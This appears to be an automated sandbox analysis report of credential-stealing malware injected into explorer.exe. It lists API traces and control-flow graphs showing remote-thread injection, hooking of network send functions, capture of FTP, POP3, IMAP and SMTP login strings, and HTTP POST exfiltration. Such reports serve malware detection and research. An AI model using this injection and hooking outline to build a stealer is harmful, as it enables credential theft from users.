                                                                                                                          • RtlMoveMemory.NTDLL(00000000,02A23428,00000016), ref: 02A21940
                                                                                                                          • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02A21968
                                                                                                                          • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02A21978
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A21992
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02A2199A
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A219A8
                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A219AF
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A219C5
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A219CC
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A219E2
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A21A0C
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A21A1F
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A26
                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A2D
                                                                                                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02A21A41
                                                                                                                          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A21A58
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A65
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A6B
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02A21A71
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02A21A74
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                          • String ID: 0-gwP,gw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                          • API String ID: 1066286714-2377152254
                                                                                                                          • Opcode ID: 03eb3d57709bbbe045f3146c5b11d4b4d809e9d0ea16574be31f4271f622d656
                                                                                                                          • Instruction ID: 2dc604f2b905a7fedc6b48742b55a2bd8e641d71abacc75b03ab81b495b549f6
                                                                                                                          • Opcode Fuzzy Hash: 03eb3d57709bbbe045f3146c5b11d4b4d809e9d0ea16574be31f4271f622d656
                                                                                                                          • Instruction Fuzzy Hash: 1A619C31A48314AFD720DF299D84E7BBBECEB4A754F010A58F94993241DF34D9098BB1

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02A2265A
                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02A22672
                                                                                                                          • lstrlen.KERNEL32(?,00000000), ref: 02A2267A
                                                                                                                          • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02A22685
                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02A2269F
                                                                                                                          • wsprintfA.USER32 ref: 02A226B6
                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 02A226CF
                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02A226D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                          • String ID: %02X
                                                                                                                          • API String ID: 3341110664-436463671
                                                                                                                          • Opcode ID: c855a6739344a58eeff81d9d4dd435287200e2f7e7a8409243c16087a624ff4e
                                                                                                                          • Instruction ID: 375cb54e72e2da2fe6b467a477c813890740e3853ffb0620fc93cb86ee70cf31
                                                                                                                          • Opcode Fuzzy Hash: c855a6739344a58eeff81d9d4dd435287200e2f7e7a8409243c16087a624ff4e
                                                                                                                          • Instruction Fuzzy Hash: F7115E71E44108BFDB219B99DC88EBEBFBCEB45301F1044A1F605E2100DB358E1A9B70

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
                                                                                                                            • Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,02A2109E,?,02A21010), ref: 02A2134A
                                                                                                                          • GetCurrentProcessId.KERNEL32(00000003,?,02A2109E,?,02A21010), ref: 02A2135B
                                                                                                                          • wsprintfA.USER32 ref: 02A21372
                                                                                                                            • Part of subcall function 02A2263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02A2265A
                                                                                                                            • Part of subcall function 02A2263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02A22672
                                                                                                                            • Part of subcall function 02A2263E: lstrlen.KERNEL32(?,00000000), ref: 02A2267A
                                                                                                                            • Part of subcall function 02A2263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02A22685
                                                                                                                            • Part of subcall function 02A2263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02A2269F
                                                                                                                            • Part of subcall function 02A2263E: wsprintfA.USER32 ref: 02A226B6
                                                                                                                            • Part of subcall function 02A2263E: CryptDestroyHash.ADVAPI32(?), ref: 02A226CF
                                                                                                                            • Part of subcall function 02A2263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02A226D9
                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02A21389
                                                                                                                          • GetLastError.KERNEL32 ref: 02A2138F
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 02A213A1
                                                                                                                            • Part of subcall function 02A224D5: GetCurrentProcessId.KERNEL32 ref: 02A224E7
                                                                                                                            • Part of subcall function 02A224D5: GetCurrentThreadId.KERNEL32 ref: 02A224EF
                                                                                                                            • Part of subcall function 02A224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02A224FF
                                                                                                                            • Part of subcall function 02A224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 02A2250D
                                                                                                                            • Part of subcall function 02A224D5: CloseHandle.KERNEL32(00000000), ref: 02A22566
                                                                                                                          • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 02A213B8
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A213BF
                                                                                                                          • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 02A213E4
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A213EB
                                                                                                                            • Part of subcall function 02A21DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02A21E1D
                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 02A2141D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                          • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                          • API String ID: 706757162-1430290102
                                                                                                                          • Opcode ID: 75caf7109cce0ef13b5da0bf604653198b8b46446a61f65260aee05d8fad825b
                                                                                                                          • Instruction ID: b3122b964c43629c4009012c5637c90bbb91d85cbbb118857015b56db88563ad
                                                                                                                          • Opcode Fuzzy Hash: 75caf7109cce0ef13b5da0bf604653198b8b46446a61f65260aee05d8fad825b
                                                                                                                          • Instruction Fuzzy Hash: 04316431BC4234B7DF206FAC9D09B7A7B56AB16701F014454F90A96591CF79C91E8BA0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 236 2a21647-2a2165a 237 2a21660-2a21662 236->237 238 2a21748-2a2174f 236->238 237->238 239 2a21668-2a2166b 237->239 239->238 240 2a21671-2a2167d lstrlen 239->240 241 2a21683-2a2168a lstrlen 240->241 242 2a21747 240->242 241->242 243 2a21690-2a216a8 getpeername 241->243 242->238 243->242 244 2a216ae-2a216ca inet_ntoa htons 243->244 244->242 245 2a216cc-2a216d4 244->245 246 2a216d6-2a216d9 245->246 247 2a21708 245->247 248 2a216f3-2a216f8 246->248 249 2a216db-2a216de 246->249 250 2a2170d-2a2173c call 2a22861 wsprintfA call 2a224ae 247->250 248->250 251 2a216e0-2a216e3 249->251 252 2a21701-2a21706 249->252 250->242 260 2a2173e-2a21745 call 2a22843 250->260 255 2a216e5-2a216ea 251->255 256 2a216fa-2a216ff 251->256 252->250 255->248 258 2a216ec-2a216f1 255->258 256->250 258->242 258->248 260->242
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                          • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                          • API String ID: 3379139566-1703351401
                                                                                                                          • Opcode ID: 5a351b428e538df55045d9bdbecb7d9306f0a42c1a43bd8a91110aac67c7ea87
                                                                                                                          • Instruction ID: d187b402ca0dcd03af5b1945e8895e0065e598ba019f927266ebcae672b7512f
                                                                                                                          • Opcode Fuzzy Hash: 5a351b428e538df55045d9bdbecb7d9306f0a42c1a43bd8a91110aac67c7ea87
                                                                                                                          • Instruction Fuzzy Hash: A821A631F00269E79F105FAD8DC46BEBAB99B95205B0840B5ED09D3112DF35C91D8F60

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 268 2a21752-2a21774 GetModuleHandleA GetProcAddress 269 2a217c1-2a217c6 268->269 270 2a21776-2a217c0 RtlZeroMemory * 4 268->270 270->269
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,02A21539,?,?,?,02A2144B,?), ref: 02A21763
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A2176A
                                                                                                                          • RtlZeroMemory.NTDLL(02A24228,00000104), ref: 02A21788
                                                                                                                          • RtlZeroMemory.NTDLL(02A24118,00000104), ref: 02A21790
                                                                                                                          • RtlZeroMemory.NTDLL(02A24330,00000104), ref: 02A21798
                                                                                                                          • RtlZeroMemory.NTDLL(02A24000,00000104), ref: 02A217A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                          • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                          • API String ID: 1490332519-278825019
                                                                                                                          • Opcode ID: ba2757d8c8a9f5b9eb62fc8d74a09a3bb1874d70e833bc1210f0b8fdf8922411
                                                                                                                          • Instruction ID: 7a311d4c7d3346db3ef09bc6c176590fdff8481554ac8b3457585c1de5f453bf
                                                                                                                          • Opcode Fuzzy Hash: ba2757d8c8a9f5b9eb62fc8d74a09a3bb1874d70e833bc1210f0b8fdf8922411
                                                                                                                          • Instruction Fuzzy Hash: 8CF08922FC037C33F52022AE7C46C57FF5CE56AEA670305D1BA0A631018DA9A80D4BF4

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 02A224E7
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02A224EF
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02A224FF
                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 02A2250D
                                                                                                                          • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02A2252C
                                                                                                                          • SuspendThread.KERNEL32(00000000), ref: 02A2253C
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A2254B
                                                                                                                          • Thread32Next.KERNEL32(00000000,0000001C), ref: 02A2255B
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A22566
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1467098526-0
                                                                                                                          • Opcode ID: 855beafc1aca974bdadd973224eb7f9528efa04842b1e2d55cb561a55a79adee
                                                                                                                          • Instruction ID: 18a8b843a87a7c7c51ae7460e5db2e31662f7857b5806c76e20d5a93684d50d4
                                                                                                                          • Opcode Fuzzy Hash: 855beafc1aca974bdadd973224eb7f9528efa04842b1e2d55cb561a55a79adee
                                                                                                                          • Instruction Fuzzy Hash: E8117371D48210EBDB209F68A45CB7EBBB8FB46701F014959F94192140DB38C91ECBB2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 282 2a21f4a-2a21fa5 call 2a222b8 call 2a22861 call 2a227e2 call 2a22374 291 2a21fc0-2a21fcc 282->291 292 2a21fa7-2a21fbe 282->292 295 2a21fd0-2a21fd2 291->295 292->295 296 2a222a6-2a222b5 call 2a22843 295->296 297 2a21fd8-2a2200f RtlZeroMemory 295->297 301 2a22015-2a22030 297->301 302 2a2229e-2a222a5 297->302 303 2a22062-2a22074 301->303 304 2a22032-2a22043 call 2a222e5 301->304 302->296 311 2a22078-2a2207a 303->311 309 2a22056 304->309 310 2a22045-2a22054 304->310 312 2a22058-2a22060 309->312 310->312 313 2a22080-2a220dc call 2a22731 311->313 314 2a2228b-2a22291 311->314 312->311 322 2a220e2-2a220e7 313->322 323 2a22284 313->323 316 2a22293-2a22295 call 2a22843 314->316 317 2a2229a 314->317 316->317 317->302 324 2a22101-2a2212f call 2a22861 wsprintfW 322->324 325 2a220e9-2a220fa 322->325 323->314 328 2a22131-2a22133 324->328 329 2a22148-2a2215f 324->329 325->324 330 2a22134-2a22137 328->330 335 2a22161-2a22197 call 2a22861 wsprintfW 329->335 336 2a2219e-2a221b8 329->336 331 2a22142-2a22144 330->331 332 2a22139-2a2213e 330->332 331->329 332->330 334 2a22140 332->334 334->329 335->336 340 2a22261-2a22277 call 2a22843 336->340 341 2a221be-2a221d1 336->341 349 2a22280 340->349 350 2a22279-2a2227b call 2a22843 340->350 341->340 344 2a221d7-2a221ed call 2a22861 341->344 352 2a221ef-2a221fa 344->352 349->323 350->349 353 2a2220e-2a22225 352->353 354 2a221fc-2a22209 call 2a22826 352->354 358 2a22227 353->358 359 2a22229-2a22236 353->359 354->353 358->359 359->352 360 2a22238-2a2223c 359->360 361 2a22256-2a2225d call 2a22843 360->361 362 2a2223e 360->362 361->340 363 2a2223e call 2a22815 362->363 365 2a22243-2a22250 RtlMoveMemory 363->365 365->361
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02A22861: GetProcessHeap.KERNEL32(00000008,0000A000,02A210CC), ref: 02A22864
                                                                                                                            • Part of subcall function 02A22861: RtlAllocateHeap.NTDLL(00000000), ref: 02A2286B
                                                                                                                            • Part of subcall function 02A227E2: lstrlen.KERNEL32(02A240DA,?,00000000,00000000,02A21F86,774C8A60,02A240DA,00000000), ref: 02A227EA
                                                                                                                            • Part of subcall function 02A227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,02A240DA,00000001,00000000,00000000), ref: 02A227FC
                                                                                                                            • Part of subcall function 02A22374: RtlZeroMemory.NTDLL(?,00000018), ref: 02A22386
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000003C), ref: 02A21FE2
                                                                                                                          • wsprintfW.USER32 ref: 02A2211B
                                                                                                                          • wsprintfW.USER32 ref: 02A22186
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02A22250
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                          • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                          • API String ID: 4204651544-1701262698
                                                                                                                          • Opcode ID: bc8df1d9a694015df024925beaf73294a5ffdd2163044572cee991522addfdc5
                                                                                                                          • Instruction ID: 0388657d10c1f750f9d7f13d37ab60796dc6bf0839096ec4c15288916a3dd1b1
                                                                                                                          • Opcode Fuzzy Hash: bc8df1d9a694015df024925beaf73294a5ffdd2163044572cee991522addfdc5
                                                                                                                          • Instruction Fuzzy Hash: ACA15871A48325AFD720DF689884B2BBBE9BB89344F10092DF985D3250DF75D90DCB62

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 367 2a225ad-2a225c9 OpenProcess 368 2a22600-2a22607 367->368 369 2a225cb-2a225da IsWow64Process 367->369 370 2a225f7 369->370 371 2a225dc-2a225ec IsWow64Process 369->371 372 2a225f9-2a225fa CloseHandle 370->372 371->372 373 2a225ee-2a225f5 371->373 372->368 373->372
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,774CE800,?,?,microsoftedgecp.exe,02A21287), ref: 02A225BF
                                                                                                                          • IsWow64Process.KERNEL32(000000FF,?), ref: 02A225D1
                                                                                                                          • IsWow64Process.KERNEL32(00000000,?), ref: 02A225E4
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A225FA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                          • String ID: microsoftedgecp.exe
                                                                                                                          • API String ID: 331459951-1475183003
                                                                                                                          • Opcode ID: d817add762090fadf29137f53fe06bf26915e0e521dbdd37961b3fc52cfa02f5
                                                                                                                          • Instruction ID: 7c467adaa6656acaec9075b7d3bd879479e08b05990cb32dfd25fc4e6a540f4c
                                                                                                                          • Opcode Fuzzy Hash: d817add762090fadf29137f53fe06bf26915e0e521dbdd37961b3fc52cfa02f5
                                                                                                                          • Instruction Fuzzy Hash: 17F09072D46228FF9B20CF9899989FE777CEB02355B1442AAFD0092140DB358F09E6B0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 422 2a21b17-2a21b2c 423 2a21b60-2a21b68 422->423 424 2a21b2e 422->424 426 2a21bc3-2a21bcb 423->426 427 2a21b6a-2a21b6f 423->427 425 2a21b30-2a21b5e RtlMoveMemory 424->425 425->423 425->425 428 2a21c0b 426->428 429 2a21bcd-2a21bdf 426->429 430 2a21bbe-2a21bc1 427->430 432 2a21c0d-2a21c12 428->432 429->428 431 2a21be1-2a21bfe LdrProcessRelocationBlock 429->431 430->426 433 2a21b71-2a21b84 LoadLibraryA 430->433 431->428 434 2a21c00-2a21c04 431->434 435 2a21c15-2a21c17 433->435 436 2a21b8a-2a21b8f 433->436 434->428 437 2a21c06-2a21c09 434->437 435->432 438 2a21bb6-2a21bb9 436->438 437->428 437->431 439 2a21b91-2a21b95 438->439 440 2a21bbb 438->440 441 2a21b97-2a21b9a 439->441 442 2a21b9c-2a21b9f 439->442 440->430 443 2a21ba1-2a21bab GetProcAddress 441->443 442->443 443->435 444 2a21bad-2a21bb3 443->444 444->438
                                                                                                                          APIs
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,?), ref: 02A21B4E
                                                                                                                          • LoadLibraryA.KERNEL32(?,02A24434,00000000,00000000,774D2EE0,00000000,02A21910,?,?,?,00000001,?,00000000), ref: 02A21B76
                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02A21BA3
                                                                                                                          • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02A21BF4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_24_2_2a21000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3827878703-0
                                                                                                                          • Opcode ID: ff71cd99ec87b90de7cec175d9a80f09fafc198a7df9768172841eb524aa3d37
                                                                                                                          • Instruction ID: becd1c1c26cd53cc8b29c36f408675f686c4e854f1f3da3a5e38e0a8bfd69317
                                                                                                                          • Opcode Fuzzy Hash: ff71cd99ec87b90de7cec175d9a80f09fafc198a7df9768172841eb524aa3d37
                                                                                                                          • Instruction Fuzzy Hash: DD318375700225ABCB24CF2DC8C4B76B7F8EF05319B15456DE94AC7602EB35E85ACBA0

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:8.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:9
                                                                                                                          Total number of Limit Nodes:2
                                                                                                                          execution_graph 761 149fab 762 14a1f3 761->762 763 149fd8 761->763 766 14a048 763->766 767 14a04d 766->767 768 14a135 LoadLibraryA 767->768 769 14a190 VirtualProtect VirtualProtect 767->769 771 149ff8 767->771 768->767 770 14a1e8 769->770 770->770

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_00142010 4 Function_00141A04 0->4 1 Function_0014141D 2 Function_00142E98 2->4 13 Function_00142E08 2->13 18 Function_00142CB8 2->18 31 Function_00141DD4 2->31 42 Function_00142BF4 2->42 46 Function_00142B70 2->46 3 Function_00142418 20 Function_00141838 3->20 32 Function_00142054 3->32 52 Function_00141860 3->52 5 Function_00141405 6 Function_00141000 7 Function_00142E80 8 Function_0014188C 8->20 9 Function_00141508 10 Function_00141A88 11 Function_00141C08 12 Function_00142508 34 Function_001418D0 12->34 37 Function_001425C4 12->37 51 Function_001424E0 12->51 13->3 33 Function_00141D50 13->33 13->52 56 Function_001418E8 13->56 14 Function_00143088 14->2 44 Function_00141B70 14->44 15 Function_0014A00A 16 Function_00141BB0 17 Function_001414B2 18->20 24 Function_00141D20 18->24 18->52 19 Function_00141938 21 Function_001445A7 22 Function_00143220 22->11 22->16 22->19 22->20 27 Function_00141C28 22->27 22->44 54 Function_00142860 22->54 23 Function_00142620 25 Function_00143020 25->2 25->44 26 Function_00141822 28 Function_00149FAB 40 Function_0014A048 28->40 29 Function_00141254 30 Function_001414D4 31->20 32->0 32->8 32->19 32->20 32->34 38 Function_00141F40 32->38 45 Function_00141E70 32->45 49 Function_001418F8 32->49 32->52 33->20 35 Function_0014355C 35->20 35->22 35->35 35->44 47 Function_001430F0 35->47 36 Function_00141C58 48 Function_001425FC 37->48 38->20 38->49 39 Function_00144A41 40->15 41 Function_00142774 43 Function_00141576 46->4 46->20 47->10 47->12 47->20 47->36 47->52 50 Function_001414F9 52->44 53 Function_00141560 54->23 54->41 54->44 55 Function_0014156C

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 119 14355c-14356c call 141b70 122 143572-1435a5 call 141838 119->122 123 1435fc-143601 119->123 127 1435a7 call 141838 122->127 128 1435d1-1435f6 NtUnmapViewOfSection 122->128 131 1435ac-1435c5 127->131 132 143608-143617 call 143220 128->132 133 1435f8-1435fa 128->133 131->128 139 143621-14362a 132->139 140 143619-14361c call 14355c 132->140 133->123 134 143602-143607 call 1430f0 133->134 134->132 140->139
                                                                                                                          APIs
                                                                                                                          • NtUnmapViewOfSection.NTDLL ref: 001435D8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_141000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionUnmapView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 498011366-0
                                                                                                                          • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                          • Instruction ID: efde287ca869b35571563247abfd353dc96a7a8b0ed6707cd44fcfcc0ba01fd1
                                                                                                                          • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                          • Instruction Fuzzy Hash: 78115430615E095FEB58FBB898AD27937A0EB65301F54452AA429C76B1DB398A41C701

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 143220-14325b call 141838 3 143261-143273 CreateToolhelp32Snapshot 0->3 4 143549-143554 SleepEx 3->4 5 143279-14328f Process32First 3->5 4->3 6 143538-14353a 5->6 7 143294-1432ac 6->7 8 143540-143543 CloseHandle 6->8 10 1432b2-1432c6 7->10 11 14348c-143495 call 141bb0 7->11 8->4 10->11 15 1432cc-1432e0 10->15 16 14352a-143532 Process32Next 11->16 17 14349b-1434a4 call 141c08 11->17 15->11 22 1432e6-1432fa 15->22 16->6 17->16 21 1434aa-1434b1 call 141c28 17->21 21->16 26 1434b3-1434c1 call 141b70 21->26 22->11 27 143300-143314 22->27 26->16 31 1434c3-143525 call 141938 call 142860 call 141938 26->31 27->11 32 14331a-14332e 27->32 31->16 32->11 35 143334-143348 32->35 35->11 40 14334e-143362 35->40 40->11 44 143368-14337c 40->44 44->11 46 143382-143396 44->46 46->11 48 14339c-1433b0 46->48 48->11 50 1433b6-1433ca 48->50 50->11 52 1433d0-1433e4 50->52 52->11 54 1433ea-1433fe 52->54 54->11 56 143404-143418 54->56 56->11 58 14341a-14342e 56->58 58->11 60 143430-143444 58->60 60->11 62 143446-14345a 60->62 62->11 64 14345c-143470 62->64 64->11 66 143472-143486 64->66 66->11 66->16
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_141000_explorer.jbxd
                                                                                                                          Yara matches
